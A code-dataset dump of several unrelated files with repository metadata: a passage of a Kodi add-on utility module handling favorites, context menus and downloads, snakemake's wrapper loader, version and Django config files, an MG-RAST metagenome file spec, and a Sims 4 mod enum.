LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_VideoUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDowfnloader',urllib.quote_plus(labs['url']),'false')))
#contextMenuItems.append(('Downloader','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',labs['url'],'false','','')))
return contextMenuItems
def ContextMenu_ImageUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioRadioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def XBMC_RunPlugin(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.RunPlugin(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
def XBMC_ContainerUpdate(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.Container.Update(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
### ############################################################################################################
### ############################################################################################################
def SendTo_JDownloader(url,useResolver=True):
myNote('Download','sending to jDownloader plugin',15000)
if useResolver==True:
try:
import urlresolver
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
xbmc.executebuiltin("XBMC.RunPlugin(plugin://plugin.program.jdownloader/?action=addlink&url=%s)" % link)
try: _addon.resolve_url(url)
except: pass
### ############################################################################################################
### ############################################################################################################
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import c_HiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
def ExtractThis(filename,destpath):
import c_Extract as extract
return extract.allNoProgress(filename,destpath)
def DownloadThis(url,destfile,destpath,useResolver=True):
destpath=xbmc.translatePath(destpath)
import c_HiddenDownloader as downloader
debob(str(useResolver))
if useResolver==True:
try:
import urlresolver
#debob(urlresolver.HostedMediaFile(url))
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
deb('downloadable url',link)
downloader.download(link,destfile,destpath,useResolver)
#downloader.download(url,destfile,destpath,useResolver)
### ############################################################################################################
### ############################################################################################################
def XBMC_RefreshRSS(): xbmc.executebuiltin("XBMC.RefreshRSS()")
def XBMC_EjectTray(): xbmc.executebuiltin("XBMC.EjectTray()")
def XBMC_Mute(): xbmc.executebuiltin("XBMC.Mute()")
def XBMC_System_Exec(url): xbmc.executebuiltin("XBMC.System.Exec(%s)" % url)
def XBMC_System_ExecWait(url): xbmc.executebuiltin("XBMC.System.ExecWait(%s)" % url)
def XBMC_PlayDVD(): xbmc.executebuiltin("XBMC.PlayDVD()")
def XBMC_ReloadSkin(): xbmc.executebuiltin("XBMC.ReloadSkin()")
def XBMC_UpdateAddonRepos(): xbmc.executebuiltin("XBMC.UpdateAddonRepos()")
def XBMC_UpdateLocalAddons(): xbmc.executebuiltin("XBMC.UpdateLocalAddons()")
def XBMC_Weather_Refresh(): xbmc.executebuiltin("XBMC.Weather.Refresh()")
def XBMC_ToggleDebug(): xbmc.executebuiltin("XBMC.ToggleDebug()")
def XBMC_Minimize(): xbmc.executebuiltin("XBMC.Minimize()")
def XBMC_ActivateScreensaver(): xbmc.executebuiltin("XBMC.ActivateScreensaver()")
### ############################################################################################################
### ############################################################################################################
def fav__COMMON__empty(site,section,subfav=''): WhereAmI('@ Favorites - Empty - %s%s' % (section,subfav)); favs=[]; cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); myNote(bFL('Favorites'),bFL('Your Favorites Have Been Wiped Clean. Bye Bye.'))
def fav__COMMON__remove(site,section,name,year,subfav=''):
WhereAmI('@ Favorites - Remove - %s%s' % (section,subfav)); deb('fav__remove() '+section,name+' ('+year+')'); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); tf=False
if saved_favs:
favs=eval(saved_favs)
if favs:
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def fav__COMMON__add(site,section,name,year='',img=_artIcon,fanart=_artFanart,subfav='',plot='',commonID='',commonID2='',ToDoParams='',Country='',Genres='',Url=''):
debob(['fav__add()',section,name+' ('+year+')',img,fanart]); WhereAmI('@ Favorites - Add - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]; fav_found=False
if saved_favs:
#debob(saved_favs)
favs=eval(saved_favs)
if favs:
#debob(favs)
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year):
fav_found=True;
if len(year) > 0: myNote(bFL(section+': '+name.upper()+' ('+year+')'),bFL('Already in your Favorites'));
else: myNote(bFL(section+': '+name.upper()),bFL('Already in your Favorites'));
return
#
deb('Adding Favorite',site+' - '+section+' - '+subfav)
debob(['name',name,'year',year,'img',img,'fanart',fanart,'Country',Country,'Url',Url,'plot',plot,'Genres',Genres,'site',site,'subfav',subfav,'section',section,'ToDoParams',ToDoParams,'commonID',commonID,'commonID2',commonID2])
favs.append((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
##if (section==ps('section.tvshows')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],_param['dbid']))
##elif (section==ps('section.movie')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],''))
##else: myNote('Favorites: '+section,'Section not Found')
#
cache.set('favs_'+site+'__'+section+subfav+'__', str(favs));
if len(year) > 0: myNote(bFL(name+' ('+year+')'),bFL('Added to Favorites'))
else: myNote(bFL(name),bFL('Added to Favorites'))
#
def fav__COMMON__list_fetcher(site,section='',subfav=''):
WhereAmI('@ Favorites - List - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]
if saved_favs:
debob('saved_favs found'); debob(saved_favs); favs=sorted(eval(saved_favs), key=lambda fav: (fav[1],fav[0]),reverse=True); ItemCount=len(favs)
if favs:
debob('favs found'); debob(favs);
return favs
## ((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
#for (name,year,img,fanart,country,url,plot,genre,dbid) in favs:
# except: deb('Error Listing Item',name+' ('+year+')')
# else: myNote('Favorites: '+section,'Section not found');
#if (section==ps('section.tvshows')): set_view('tvshows',addst('anime-view'),True)
#elif (section==ps('section.movie')): set_view('movies' ,addst('movies-view'),True)
else: return ''
else: return ''
#
def fav__COMMON__check(site,section,name,year,subfav=''):
saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__');
if saved_favs:
favs=eval(saved_favs);
if favs:
#debob(favs);
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
#if (name==_name) and (year==_year): return True
if (name==_name): return True
return False
else: return False
else: return False
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
years=re.compile(' \((\d+)\)').findall('__'+name+'__')
for year in years:
name=name.replace(' ('+year+')','')
name=name.strip()
return name
def filename_filter_colorcodes(name=''):
if ('[/color]' in name): name=name.replace('[/color]','')
if ('[/COLOR]' in name): name=name.replace('[/COLOR]','')
if ('[color lime]' in name): name=name.replace('[color lime]','')
if ('[COLOR lime]' in name): name=name.replace('[COLOR lime]','')
if ('[COLOR green]' in name): name=name.replace('[COLOR green]','')
if ('[COLOR yellow]' in name): name=name.replace('[COLOR yellow]','')
if ('[COLOR red]' in name): name=name.replace('[COLOR red]','')
if ('[b]' in name): name=name.replace('[b]','')
if ('[B]' in name): name=name.replace('[B]','')
if ('[/b]' in name): name=name.replace('[/b]','')
if ('[/B]' in name): name=name.replace('[/B]','')
if ('[cr]' in name): name=name.replace('[cr]','')
if ('[CR]' in name): name=name.replace('[CR]','')
if ('[i]' in name): name=name.replace('[i]','')
if ('[I]' in name): name=name.replace('[I]','')
if ('[/i]' in name): name=name.replace('[/i]','')
if ('[/I]' in name): name=name.replace('[/I]','')
if ('[uppercase]' in name): name=name.replace('[uppercase]','')
if ('[UPPERCASE]' in name): name=name.replace('[UPPERCASE]','')
if ('[lowercase]' in name): name=name.replace('[lowercase]','')
if ('[LOWERCASE]' in name): name=name.replace('[LOWERCASE]','')
name=name.strip()
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
return name
def Download_PrepExt(url,ext='.flv'):
if '.zip' in url: ext='.zip' #Compressed Files
elif '.rar' in url: ext='.rar'
elif '.z7' in url: ext='.z7'
elif '.png' in url: ext='.png' #images
elif '.jpg' in url: ext='.jpg'
elif '.gif' in url: ext='.gif'
elif '.bmp' in url: ext='.bmp'
elif '.jpeg' in url: ext='.jpeg'
elif '.mp4' in url: ext='.mp4' #Videos
elif '.mpeg' in url: ext='.mpeg'
elif '.avi' in url: ext='.avi'
elif '.flv' in url: ext='.flv'
elif '.wmv' in url: ext='.wmv'
elif '.mp3' in url: ext='.mp3' #others
elif '.txt' in url: ext='.txt'
#else: ext='.flv' #Default File Extention ('.flv')
return ext
### ############################################################################################################
### ############################################################################################################
def visited_DoCheck(urlToCheck,s='[B][COLOR yellowgreen]@[/COLOR][/B] ',e='[COLOR black]@[/COLOR] '):
#visited_empty()
#return ''
vc=visited_check(urlToCheck)
if (vc==True): return s
else:
##visited_add(urlToCheck)
return e
def visited_check(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if (urlToCheck in visits): return True
return False
def visited_check2(urlToCheck):
try: saved_visits = cache.get('visited_')
except: return False
erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
if not saved_visits: return False #xbmc.executebuiltin(erNoFavs)
if saved_visits == '[]': return False #xbmc.executebuiltin(erNoFavs)
if saved_visits:
visits = eval(saved_visits)
if visits:
for (title) in visits:
if (urlToCheck in title): return True
return False
def visited_empty():
saved_favs = cache.get('visited_')
favs = []
cache.set('visited_', str(favs))
notification('[B][COLOR orange]Visited[/COLOR][/B]','[B] Your Visited Data has been wiped clean. Bye Bye.[/B]')
def visited_remove(urlToRemove):
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
visits = eval(saved_visits)
if visits:
#print visits; print urlToRemove
for (title) in visits:
if (urlToRemove==title):
visits.remove((urlToRemove));
cache.set('visited_', str(visits))
#RefreshList();
return
##########
##if saved_favs:
## favs=eval(saved_favs)
## if favs:
## for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
## if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
## if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
## else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def visited_add(urlToAdd):
if (urlToAdd==''): return ''
elif (urlToAdd==None): return ''
deb('checking rather url has been visited',urlToAdd)
saved_visits = cache.get('visited_')
visits = []
if saved_visits:
#deb('saved visits',saved_visits)
visits = eval(saved_visits)
if visits:
if (urlToAdd) in visits: return
visits.append((urlToAdd))
cache.set('visited_', str(visits))
def wwCMI(cMI,ww,t): #for Watched State ContextMenuItems
sRP='XBMC.RunPlugin(%s)'; site=addpr("site"); section=addpr("section");
if ww==7:
cMI.append(("Unmark",sRP % _addon.build_plugin_url({'mode':'RemoveVisit','title':t,'site':site,'section':section})))
cMI.append(("Empty Visits",sRP % _addon.build_plugin_url({'mode':'EmptyVisit','site':site,'section':section})))
elif ww==6:
cMI.append(("Mark",sRP % _addon.build_plugin_url({'mode':'AddVisit','title':t,'site':site,'section':section})))
return cMI
### ############################################################################################################
### ############################################################################################################
def refresh_meta(video_type,old_title,imdb,alt_id,year,new_title=''):
try: from metahandler import metahandlers
except: return
__metaget__=metahandlers.MetaData()
if new_title: search_title=new_title
else: search_title=old_title
if video_type=='tvshow':
api=metahandlers.TheTVDB(); results=api.get_matching_shows(search_title); search_meta=[]
for item in results: option={'tvdb_id':item[0],'title':item[1],'imdb_id':item[2],'year':year}; search_meta.append(option)
else: search_meta=__metaget__.search_movies(search_title)
debob(search_meta); #deb('search_meta',search_meta);
option_list=['Manual Search...']
for option in search_meta:
if 'year' in option: disptitle='%s (%s)' % (option['title'],option['year'])
else: disptitle=option['title']
option_list.append(disptitle)
dialog=xbmcgui.Dialog(); index=dialog.select('Choose',option_list)
if index==0: refresh_meta_manual(video_type,old_title,imdb,alt_id,year)
elif index > -1:
new_imdb_id=search_meta[index-1]['imdb_id']
#Temporary workaround for metahandlers problem:
#Error attempting to delete from cache table: no such column: year
if video_type=='tvshow': year=''
try: _1CH.log(search_meta[index-1])
except: pass
__metaget__.update_meta(video_type,old_title,imdb,year=year); xbmc.executebuiltin('Container.Refresh')
def refresh_meta_manual(video_type,old_title,imdb,alt_id,year):
keyboard=xbmc.Keyboard()
if year: disptitle='%s (%s)' % (old_title,year)
else: disptitle=old_title
keyboard.setHeading('Enter a title'); keyboard.setDefault(disptitle); keyboard.doModal()
if keyboard.isConfirmed():
search_string=keyboard.getText()
refresh_meta(video_type,old_title,imdb,alt_id,year,search_string)
### ############################################################################################################
### ############################################################################################################
def DoE(e): xbmc.executebuiltin(E)
def DoA(a): xbmc.executebuiltin("Action(%s)" % a)
### ############################################################################################################
### ############################################################################################################
| [
"[email protected]"
]
| |
a7db7a35a129dddef9b0cb830716ebca4fed85be | 42366c1e36038bf879652b4f4c45c6105209a738 | /snakemake/wrapper.py | 52b1c95f9256a8db894ea389c38ad40fd4bec165 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | endrebak/snakemake_dev | e22989e40d475250a1f6e44421290b75dcaf6651 | 846cad1273de7cf43a25fc210174ce43dfd45a8a | refs/heads/master | 2021-01-13T16:01:30.593695 | 2016-12-14T08:21:22 | 2016-12-14T08:21:22 | 76,775,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | __author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "[email protected]"
__license__ = "MIT"
import os
import posixpath
from snakemake.script import script
def is_script(path):
return path.endswith("wrapper.py") or path.endswith("wrapper.R")
def get_path(path, prefix=None):
if not (path.startswith("http") or path.startswith("file:")):
if prefix is None:
prefix = "https://bitbucket.org/snakemake/snakemake-wrappers/raw/"
path = prefix + path
return path
def get_script(path, prefix=None):
path = get_path(path)
if not is_script(path):
path += "/wrapper.py"
return path
def get_conda_env(path):
path = get_path(path)
if is_script(path):
# URLs and posixpaths share the same separator. Hence use posixpath here.
path = posixpath.dirname(path)
return path + "/environment.yaml"
def wrapper(path, input, output, params, wildcards, threads, resources, log, config, rulename, conda_env, prefix):
"""
Load a wrapper from https://bitbucket.org/snakemake/snakemake-wrappers under
the given path + wrapper.py and execute it.
"""
path = get_script(path, prefix=prefix)
script(path, "", input, output, params, wildcards, threads, resources, log, config, rulename, conda_env)
| [
"[email protected]"
]
| |
ca2fa5ad4997c54d0f3874f400a20a3fbfbdaf02 | ccbe341f4bc5f46ce31968a1d764a87f6f6803a8 | /pytheas/__init__.py | 49bf2edb9ecbfe446b859aa5cdeb805ed037f51e | [
"MIT"
]
| permissive | skytreader/pytheas | 8ce1e23965c61aff5eb48a301e9a8e04d3c70a55 | c41cf985827734a1a9be1e61a93fca2a7b14c3d9 | refs/heads/master | 2023-04-09T01:54:24.423483 | 2014-06-03T04:04:35 | 2014-06-03T04:04:35 | 17,976,330 | 0 | 0 | null | 2023-03-31T14:38:58 | 2014-03-21T10:30:38 | Python | UTF-8 | Python | false | false | 156 | py | # Copied from https://github.com/andymccurdy/redis-py/blob/master/redis/__init__.py
__version__ = "0.1.2"
VERSION = tuple(map(int, __version__.split(".")))
| [
"[email protected]"
]
| |
ca15e754c14f4db76db15fe9fb24de4b5692d004 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4459099.3.spec | f64a808352387d76005b2abdd7351b26ddfed579 | []
| no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,321 | spec | {
"id": "mgm4459099.3",
"metadata": {
"mgm4459099.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1797195,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12697,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2985,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1209484,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 579,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 62053,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 2063115,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 417890,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 111447,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 70938,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 747722,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 37710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20045,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 45369,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 64413,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 21824443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 128,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1553,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 5075,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7360,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2823,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 638,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22820,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21679,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.species.stats"
}
},
"id": "mgm4459099.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4459099.3"
}
},
"raw": {
"mgm4459099.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4459099.3"
}
}
} | [
"[email protected]"
]
| |
890373e747027f7865371d1230e88bca75d7b9be | f0e3ba0707d8db85afa50701b739b570259236ca | /ppts/apps.py | 083527dbb919b18619df6ea1b4dbb874ebc2d59c | [
"MIT"
]
| permissive | Tubbz-alt/planningportal | bb3ff20ea3a730ccc2ca2ebef9e76198d5df8869 | ef8ed9e604c2ff7fb88836247aaa8eba0cfa235f | refs/heads/master | 2022-12-24T14:42:18.925112 | 2019-07-14T22:26:15 | 2019-07-14T22:26:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class PptsConfig(AppConfig):
name = 'ppts'
| [
"[email protected]"
]
| |
cc0c3f49a86cd19e0eac92eb6d9d45901dc5447e | fb5c5d50d87a6861393d31911b9fae39bdc3cc62 | /Scripts/sims4communitylib/enums/common_funds_sources.py | b752318a7a87e9b2ab9fbcb9e237f428646c1ce1 | [
"CC-BY-4.0"
]
| permissive | ColonolNutty/Sims4CommunityLibrary | ee26126375f2f59e5567b72f6eb4fe9737a61df3 | 58e7beb30b9c818b294d35abd2436a0192cd3e82 | refs/heads/master | 2023-08-31T06:04:09.223005 | 2023-08-22T19:57:42 | 2023-08-22T19:57:42 | 205,197,959 | 183 | 38 | null | 2023-05-28T16:17:53 | 2019-08-29T15:48:35 | Python | UTF-8 | Python | false | false | 2,552 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Dict
from sims.funds import FundsSource
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonFundsSource(CommonInt):
"""Sources of funds."""
HOUSEHOLD: 'CommonFundsSource' = ...
RETAIL: 'CommonFundsSource' = ...
BUSINESS: 'CommonFundsSource' = ...
